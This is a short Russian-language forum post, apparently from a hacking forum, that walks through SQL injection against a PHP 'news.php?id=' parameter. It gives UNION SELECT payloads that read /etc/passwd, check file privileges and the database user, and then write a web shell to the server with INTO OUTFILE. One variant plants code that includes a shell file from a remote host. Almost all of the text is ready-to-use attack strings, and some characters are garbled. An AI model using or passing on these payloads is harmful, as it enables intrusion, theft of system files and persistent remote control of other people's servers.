1). сперва проверь magic_quotes_gpc (условие mq=off должен быть, ну если ты чайник, для особо одаренных есть обход https://forum.antichat.ru/showpost.php?p=663815&postcount=39)
2). потом проверь права на чтение/запись файлов
http://test/news.php?id=1+union+select+1,load_file('/etc/passwd'),2,3--
или так
http://test/news.php?id=1+union+select+1,file_priv,2,3+from+my sql_user+where+user='root')--
насчет user-а можешь проверить запросом
http://test/news/php?id=1+union+select+1,user(),2,3--
выдаст root@localhost, пишешь без всяких локалхостов.
3). если все данные пункты выполнились на ура, идем дальше.
http://test/news.php?id=1+union+select+1,'код_шелла',2 ,3+into+outfile+'полный_путь_серве� �а'--
или если не хочешь заморачиваться (обз. условие allow_url_include=on)
http://test/news.php?id=1+union+select+1,'<?php @include("http://test2/shell.txt"); ?> ',2,3+into+outfile+'полный_путь_серв ера'--